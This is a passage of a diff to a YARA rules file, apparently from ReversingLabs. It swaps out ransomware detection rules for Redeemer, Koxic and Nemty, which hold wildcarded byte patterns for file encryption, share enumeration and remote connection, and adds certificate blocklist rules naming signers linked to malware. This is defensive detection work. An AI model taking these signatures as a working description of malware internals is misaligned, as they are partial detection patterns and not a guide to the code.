+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $create_key ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RAFO TECHNOLOGY INC" and pe.signatures [ i ] . serial == "21:1b:5d:fe:65:bc:6f:34:bc:9d:3a:54" and 1526717931 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Redeemer : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_5400D1C1406528B1Ef625976 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Redeemer ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "080ab595-862b-5dc2-aaff-a0efd819a9fa"
-		date = "2022-01-17"
-		modified = "2022-01-17"
+		id = "2b35f2db-ebf1-5533-858c-644dbd6dfb2b"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Redeemer.yara#L1-L105"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "28287f6620a2f7a90057d1f97947e065721119e26398fe659331dc5fe99761de"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L15004-L15020"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "fbdd37e050d68c4287e897f050a673aea071df105a35b07475d3233da3f03feb"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Redeemer"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B B5 ?? ?? ?? ??
-            8B BD ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C6 ?? 89 B5 ?? ??
-            ?? ?? 89 B5 ?? ?? ?? ?? 3B F7 0F 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ??
-            ?? 8B 3D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 83 EC ?? 8D 85 ?? ?? ?? ?? 8B CC 89 A5 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 EC ??
-            C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 8B CC 50 E8 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83
-            C4 ?? 84 C0 0F 85 ?? ?? ?? ?? 83 EC ?? 8D 85 ?? ?? ?? ?? 8B CC 89 A5 ?? ?? ?? ?? 50
-            E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 8B CC 50 E8 ?? ?? ?? ?? C6 45
-            ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 84 C0 75 ?? 83 EC ?? 8D 85 ?? ?? ?? ?? 8B CC 89 A5 ??
-            ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 8B CC 50 E8 ?? ??
-            ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 84 C0 75 ?? 83 EC ?? 8D 85 ?? ?? ?? ?? 8B
-            CC 50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F0
-        }
-		$encrypt_files_p1 = {
-            80 FB ?? 0F 85 ?? ?? ?? ?? 83 EC ?? 8D 55 ?? 8B CC 89 A5 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ??
-            C7 41 ?? ?? ?? ?? ?? 83 79 ?? ?? C7 41 ?? ?? ?? ?? ?? 72 ?? 8B 01 EB ?? 8B C1 33 D2
-            6A ?? 66 89 10 8D 45 ?? 52 50 E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ??
-            ?? 83 C4 ?? 8B CC C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 83
-            79 ?? ?? C7 41 ?? ?? ?? ?? ?? 72 ?? 8B 01 EB ?? 8B C1 33 D2 6A ?? 66 89 10 8D 45 ??
-            52 50 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 8D 45 ?? 3B C6
-            74 ?? 8B 45 ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 33 C0 C7 45 ??
-            ?? ?? ?? ?? 56 8D 4D ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? E8 ?? ?? ?? ?? C6 45
-        }
-		$encrypt_files_p2 = {
-            8B 85 ?? ?? ?? ?? 83 F8 ?? 72 ?? 40 8D 8D ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B 35 ?? ?? ?? ?? 33 C0 83 7D ?? ?? 66 89 85 ?? ?? ?? ?? 8D 45 ?? 0F 43 45 ??
-            50 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF D6 85 C0 0F 85 ??
-            ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 55 ?? 8D 8D
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 78 ?? ?? 72 ?? 8B 00 50 FF D6 8B 85 ?? ?? ??
-            ?? 83 F8 ?? 72 ?? 40 8D 8D ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 C7
-            85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? E9 ??
-            ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 C7 45 ?? ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8B 45 ?? 83 C4 ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 33
-            C0 C7 45 ?? ?? ?? ?? ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? E8 ?? ?? ?? ?? 8D
-            4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E
-            5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 E8
-        }
-		$modify_processes_p1 = {
-            8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D
-            ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ??
-            E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
-            C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D
-            ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ??
-            E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50
-        }
-		$modify_processes_p2 = {
-            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 99 B9 ?? ?? ?? ?? F7 F9 6A ?? 8D 8D ?? ?? ?? ?? 6A ?? 8D 04 52 8D 04 C1
-            50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 0F
-            43 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8D B5
-            ?? ?? ?? ?? 0F 43 95 ?? ?? ?? ?? 0F 43 B5 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 83 C8 ??
-            50 56 FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 99 B9 ?? ?? ?? ?? F7 F9 6A ?? 8D 8D ?? ?? ??
-            ?? 6A ?? 8D 04 52 8D 04 C1 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 85 ?? ??
-            ?? ?? 8B CC 89 A5 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC FF 37 E8
-            ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 6A ?? 6A ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? C6 45 ?? ?? 8D 85 ?? ??
-            ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 8B 4D ?? 64 89
-            0D ?? ?? ?? ?? 59 5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 FF 77
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $modify_processes_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "54:00:d1:c1:40:65:28:b1:ef:62:59:76" and 1474266628 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Koxic : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_013472D7D665557Bfa0Dc21B350A361B : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Koxic ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "73c4afb0-cfa8-5bc5-bca3-49a7710f4ab9"
-		date = "2022-04-21"
-		modified = "2022-04-21"
+		id = "9b63f06d-9808-5936-aad2-d387c74eccdd"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Koxic.yara#L1-L87"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "739faf047b95fd538422a42943fcaad6538549bf4cf33ed91385c61365af4f09"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L15022-L15038"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "ab908ef0fca56753bcba8bc85e2fdf5859b4e226c179ec5c6eb6eb3dc4014a8e"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Koxic"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$enum_shares_p1 = {
-            8B 45 ?? 50 6A ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 55 ?? 52 8B 45 ?? 50 8D 4D
-            ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? C7 45 ??
-            ?? ?? ?? ?? EB ?? 8B 45 ?? 83 C0 ?? 89 45 ?? 8B 4D ?? 3B 4D ?? 0F 83 ?? ?? ?? ?? 8B
-            55 ?? C1 E2 ?? 8B 45 ?? 83 7C 10 ?? ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 4D ?? C1
-            E1 ?? 8B 55 ?? 8B 44 0A ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 8B 4D ?? C1 E1 ?? 8B 55 ?? 8B 44 0A ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ??
-            ?? 8B 4D ?? C1 E1 ?? 8B 55 ?? 8B 44 0A ?? 50 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? C1 E0 ?? 8B 4D ?? 8B
-        }
-		$enum_shares_p2 = {
-            54 01 ?? 52 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? C7 45 ?? ?? ?? ?? ??
-            0F B6 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
-            51 FF 15 ?? ?? ?? ?? 83 E8 ?? 89 45 ?? EB ?? 8B 55 ?? 83 EA ?? 89 55 ?? 83 7D ?? ??
-            0F 8C ?? ?? ?? ?? 8B 45 ?? 0F B7 8C 45 ?? ?? ?? ?? 83 F9 ?? 0F 85 ?? ?? ?? ?? 8B 55
-            ?? 0F B7 84 55 ?? ?? ?? ?? 83 F8 ?? 75 ?? C6 45 ?? ?? EB ?? 8B 4D ?? 8D 94 4D ?? ??
-            ?? ?? 52 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 33 C9 8B 55 ?? 66 89 8C 55 ?? ?? FF
-            FF 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 95
-            ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 8B 4D ?? 51 8D 95 ?? ?? ?? ?? 52 8D 85
-            ?? ?? ?? ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? EB ?? E9 ?? ?? ?? ?? 8B 55 ?? 83 EA ?? 89
-            55 ?? E9 ?? ?? ?? ?? EB ?? 8B 45 ?? C1 E0 ?? 8B 4D ?? 8B 54 01 ?? 83 E2 ?? 74 ?? 8B
-            45 ?? C1 E0 ?? 8B 4D ?? 8B 54 01 ?? 52 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 45
-            ?? C1 E0 ?? 03 45 ?? B9 ?? ?? ?? ?? 6B D1 ?? 89 44 15 ?? B8 ?? ?? ?? ?? C1 E0 ?? 8B
-            4D ?? 89 4C 05 ?? BA ?? ?? ?? ?? D1 E2 8B 45 ?? 89 44 15 ?? 8D 4D ?? 51 E8 ?? ?? ??
-            ?? 83 C4 ?? E9 ?? ?? ?? ?? EB ?? 81 7D ?? ?? ?? ?? ?? 74 ?? EB ?? 81 7D ?? ?? ?? ??
-            ?? 0F 85 ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85
-            C0 75 ?? B8 ?? ?? ?? ?? EB ?? 33 C0
-        }
-		$find_files = {
-            8D 85 ?? ?? ?? ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 45 ?? 33 D2 8B 45 ?? 66 89 10
-            8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 33 C0 E9 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 0F B6 C0 83 F8 ?? 75 ?? E9 ??
-            ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B 55 ?? 8D 44 02 ?? 3D ?? ?? ?? ??
-            72 ?? E9 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 8B
-            48 ?? 81 79 ?? ?? ?? ?? ?? 76 ?? 6A ?? FF 15 ?? ?? ?? ?? EB ?? 8B 95 ?? ?? ?? ?? 83
-            E2 ?? 74 ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 8B 0D ?? ?? ?? ?? 51
-            FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 0D
-            ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? BA ?? ?? ?? ?? C1 E2 ?? 8B 45 ?? 89 44 15 ?? 8D 4D
-            ?? 51 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85
-            C0 75 ?? 6A ?? A1
-        }
-		$encrypt_files = {
-            8D 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 7F ?? 7C ?? 83 7D ?? ?? 73 ??
-            E9 ?? ?? ?? ?? 6A ?? 6A ?? 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 4D ?? 2B C8 8B
-            45 ?? 1B C2 89 4D ?? 89 45 ?? 6A ?? 8B 4D ?? 51 8B 55 ?? 52 6A ?? 6A ?? 8B 45 ?? 50
-            FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? E9 ?? ?? ?? ?? 83 7D ?? ?? 77 ?? 72 ??
-            81 7D ?? ?? ?? ?? ?? 73 ?? 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 6A ?? 8B 4D ?? 51 FF
-            15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 E8 ??
-            ?? ?? ?? 83 C4 ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? EB ?? E9 ?? ?? ?? ?? E9 ?? ?? ?? ??
-            EB ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 8B 4D ?? 51 6A ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89
-            45
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files ) and ( all of ( $enum_shares_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yongli Zhang" and pe.signatures [ i ] . serial == "01:34:72:d7:d6:65:55:7b:fa:0d:c2:1b:35:0a:36:1b" and 1470960000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Nemty : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_66C758A22Bfbbce327616815616Ddd07 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Nemty ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c56ecd32-5903-5bcc-aa69-a070f2c247c4"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "4a7130ad-8b66-52a1-afd2-6d10776b4451"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Nemty.yara#L1-L205"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "dc8cfdcdea8ecb2018b1b04bb1b645f6dbdc6c07357719100677c75945edef40"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L15040-L15056"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "37f0f64e2d84ef6591e1f07a05abca35b37827d26c828269fb5f38d8546a60a7"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Nemty"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$remote_connection_p1 = {
-            55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 33 DB 68 ?? ?? ?? ?? 8D 75
-            ?? 89 5D ?? E8 ?? ?? ?? ?? 50 8D 45 ?? E8 ?? ?? ?? ?? 83 78 ?? ?? 59 59 72 ?? 8B 00
-            53 53 50 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 6A ?? 33 FF 8D 75 ?? E8 ?? ?? ?? ?? 6A
-            ?? 8D 75 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 75 ?? E8 ?? ?? ?? ?? 50 8D 45 ?? E8 ??
-            ?? ?? ?? 83 78 ?? ?? 59 59 72 ?? 8B 00 53 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ??
-            ?? ?? ?? 3D ?? ?? ?? ?? 74 ?? 32 DB EB ?? B3 ?? 6A ?? 33 FF 8D 75 ?? E8 ?? ?? ?? ??
-            6A ?? 8D 75 ?? E8 ?? ?? ?? ?? 84 DB 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 75 ?? E8 ??
-            ?? ?? ?? 50 8D 45 ?? E8 ?? ?? ?? ?? 83 78 ?? ?? 59 59 72 ?? 8B 00 8B 1D ?? ?? ?? ??
-            50 FF D3 6A ?? 33 FF 8D 75 ?? 89 45 ?? E8 ?? ?? ?? ?? 6A ?? 8D 75 ?? E8 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 8D 75 ?? E8 ?? ?? ?? ?? 50 8D 45 ?? E8 ?? ?? ?? ?? 83 78 ?? ?? 59 59
-            72 ?? 8B 00 50 FF D3 33 DB 43 53 33 FF 8D 75 ?? 89 45 ?? E8 ?? ?? ?? ?? 53 8D 75 ??
-            E8 ?? ?? ?? ?? FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 59 59 FF 75 ?? FF
-        }
-		$remote_connection_p2 = {
-            D6 FF 75 ?? FF D6 68 ?? ?? ?? ?? 8D 75 ?? E8 ?? ?? ?? ?? 50 8D 45 ?? E8 ?? ?? ?? ??
-            83 78 ?? ?? 59 59 72 ?? 8B 00 50 FF 15 ?? ?? ?? ?? 53 33 FF 8D 75 ?? E8 ?? ?? ?? ??
-            53 8D 75 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 75 ?? E8 ?? ?? ?? ?? 50 8D 45 ?? E8 ??
-            ?? ?? ?? 83 78 ?? ?? 59 59 72 ?? 8B 00 33 C9 51 51 51 50 68 ?? ?? ?? ?? 51 FF 15 ??
-            ?? ?? ?? 53 33 FF 8D 75 ?? E8 ?? ?? ?? ?? 53 8D 75 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            FF 15 ?? ?? ?? ?? 8B 4D ?? 6A ?? 5A 8B C1 39 55 ?? 73 ?? 8D 45 ?? 03 45 ?? 39 55 ??
-            73 ?? 8D 4D ?? EB ?? 80 39 ?? 75 ?? C6 01 ?? 41 3B C8 75 ?? 8B 45 ?? 39 55 ?? 73 ??
-            8D 45 ?? 03 45 ?? 8B 4D ?? 39 55 ?? 73 ?? 8D 4D ?? EB ?? 80 39 ?? 75 ?? C6 01 ?? 41
-            3B C8 75 ?? 8B 45 ?? 39 55 ?? 73 ?? 8D 45 ?? 03 45 ?? 8B 4D ?? 39 55 ?? 73 ?? 8D 4D
-            ?? EB ?? 80 39 ?? 75 ?? C6 01 ?? 41 3B C8 75 ?? 83 EC ?? 8D 45 ?? 8B F4 50 E8 ?? ??
-            ?? ?? 83 EC ?? 8B F4 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 33
-            FF 8D 75 ?? E8 ?? ?? ?? ?? 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? C9 C3
-        }
-		$enum_resources_p1 = {
-            55 8B EC 83 E4 ?? 83 EC ?? A1 ?? ?? ?? ?? 33 C4 89 44 24 ?? 53 56 57 FF 15 ?? ?? ??
-            ?? 83 64 24 ?? ?? 89 44 24 ?? BB ?? ?? ?? ?? 8B 54 24 ?? 8B 4C 24 ?? D3 EA 33 C0 40
-            23 D0 0F 84 ?? ?? ?? ?? 83 64 24 ?? ?? 6A ?? 80 C1 ?? 5F 88 4C 24 ?? FF 74 24 ?? 8D
-            74 24 ?? 89 7C 24 ?? C6 44 24 ?? ?? E8 ?? ?? ?? ?? 83 64 24 ?? ?? 8B 74 24 ?? 53 89
-            7C 24 ?? C6 44 24 ?? ?? E8 ?? ?? ?? ?? 59 03 C6 8D 4C 24 ?? E8 ?? ?? ?? ?? 6A ?? 8D
-            44 24 ?? 50 83 C8 ?? 8D 74 24 ?? E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 59 8B F8 53 8B C6
-            E8 ?? ?? ?? ?? 83 7C 24 ?? ?? 8B 44 24 ?? 73 ?? 8B C6 50 FF 15 ?? ?? ?? ?? 6A ?? 33
-            FF 8D 74 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 83 7C 24 ?? ?? 75 ?? 53 E8 ?? ?? ?? ?? 59
-            8B F8 53 8D 44 24 ?? E8 ?? ?? ?? ?? 8D 44 24 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 8D 44 24 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ??
-            33 FF 8D 74 24 ?? E8 ?? ?? ?? ?? 83 7C 24 ?? ?? 75 ?? 53 E8 ?? ?? ?? ?? 59 8B F8 53
-            8D 44 24 ?? E8 ?? ?? ?? ?? 8D 44 24 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 68
-        }
-		$enum_resources_p2 = {
-            8D 44 24 ?? E8 ?? ?? ?? ?? 8D 44 24 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 33 FF 8D
-            74 24 ?? E8 ?? ?? ?? ?? 83 7C 24 ?? ?? 75 ?? 53 E8 ?? ?? ?? ?? 59 8B F8 53 8D 44 24
